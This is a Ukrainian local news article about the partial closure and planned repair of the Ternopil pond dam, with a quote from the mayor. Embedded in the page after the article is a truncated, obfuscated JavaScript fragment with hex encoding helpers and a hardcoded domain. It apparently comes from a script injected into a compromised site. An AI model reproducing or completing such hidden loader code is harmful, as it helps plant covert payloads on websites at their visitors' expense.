Ви знаходитесь: Головна / Новини / Дамбу Тернопільського ставу частково перекриють

Дамбу Тернопільського ставу частково перекриють

У зв’язку із проведенням масштабного ремонту дамби Тернопільського ставу, частково перекриють проїжджу частину. Вже з 30 червня вільною для проїзду буде лише одна смуга.

СЕРГІЙ НАДАЛ, міський голова Тернополя

«Вже із завтрашнього дня розпочнуться підготовчі роботи для проведення капітального ремонту цієї споруди. Передбачено капітальний ремонт самої проїжджої частини також капітальний ремонт гідроспоруд, які поруч з мостом, а також гідроспоруд, які вважаються ще польськими, розміщені трошки далі, по яких вода подається з озера до парку Топільче. Заплановано перекрити рух на місяць часу, розраховуємо, що за місяць часу роботи будуть повністю завершені».

Загальна вартість проекту майже 30 мільйонів гривень. Частина коштів, очікує влада міста, надійде із Фонду регіонального розвитку. Оскільки об’єм робіт та їхня вартість чималі, ремонт відбудеться у дві черги. Спершу відремонтують міст з гідроспорудами, а коли буде решта необхідних коштів, візьмуться за проїжджу частину, яка водночас є підпірною стіною Тернопільського ставу.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top